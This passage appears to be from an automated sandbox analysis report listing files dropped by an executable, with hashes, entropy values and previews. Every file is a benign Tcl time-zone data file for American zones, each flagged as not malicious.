                                                                                                                                                                                                                                            SSDEEP:96:7FE5Ct/cQ1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7FEct/N0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:8020712BBA127EA8AB52E8F5DB14286E
                                                                                                                                                                                                                                            SHA1:DAEBC76FE10770D3FC2B5E1C14823B2B5543BA35
                                                                                                                                                                                                                                            SHA-256:AFC4627879F4A618F5E3BA9EA123F3212E161F4CCFD0DF46F3B6B7CD2E2C0D7E
                                                                                                                                                                                                                                            SHA-512:2F5C63F427A5DEDD5BF2B3867BE4C13774E9276C1472BF4170BCB2DA462B848CC8088743D032765133EE138388DF4217E4FC1475B12D2C8AF657A45ED6FEDE93
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Iqaluit) {.. {-9223372036854775808 0 0 -00}.. {-865296000 -14400 0 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-147898800 -10800 1 EDDT}.. {-131569200 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {7024
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                                                                            Entropy (8bit):4.206296468996689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5seRvZGjFS/uk1p/uue/udYR/u+zN5hi/uW9/uoUF0/u8Bb/u33RU/uMZ8/unuR3:5jUjFo1pFGzfAYFqB43RMER3
                                                                                                                                                                                                                                            MD5:95B59E3EA2A270A34BDF98AA899203C8
                                                                                                                                                                                                                                            SHA1:93599597797F4BAFE5C75179FB795058B1E3527D
                                                                                                                                                                                                                                            SHA-256:4B9D5177CBA057CD53D53120A49B8A47ECCB00150018581A84851E9D5437D643
                                                                                                                                                                                                                                            SHA-512:032BC07F9E92B756A0732AECC2DFEC4C89A58B3D6D3CA57A0F99F2AD1D51676804C7B6CE50EB3B37BB8A1EF382168AC83989D609D37C57308E29B51F1FDEFB1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Jamaica) {.. {-9223372036854775808 -18430 0 LMT}.. {-2524503170 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {126248400 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {441781200 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                                                            Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                                            MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                                            SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                                            SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                                            SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8682
                                                                                                                                                                                                                                            Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                                            SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                                            SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                                            SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9553
                                                                                                                                                                                                                                            Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                                            SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                                            SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                                            SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8558
                                                                                                                                                                                                                                            Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                                            SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                                            SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                                            SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                                            MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                                            SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                                            SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                                            SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                                            MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                                            SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                                            SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                                            SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):218
                                                                                                                                                                                                                                            Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                                            MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                                            SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                                            SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                                            SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):460
                                                                                                                                                                                                                                            Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                                            MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                                            SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                                            SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                                            SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9726
                                                                                                                                                                                                                                            Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                                            MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                                            SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                                            SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                                            SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):228
                                                                                                                                                                                                                                            Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                                            MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                                            SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                                            SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                                            SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                                            Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                                            MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                                            SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                                            SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                                            SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1539
                                                                                                                                                                                                                                            Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                                            MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                                            SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                                            SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                                            SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):611
                                                                                                                                                                                                                                            Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                                            MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                                            SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                                            SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                                            SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1166
                                                                                                                                                                                                                                            Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                                            MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                                            SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                                            SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                                            SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                                            MD5:8C60DE8E522FE5D51EACD643FD8EA132
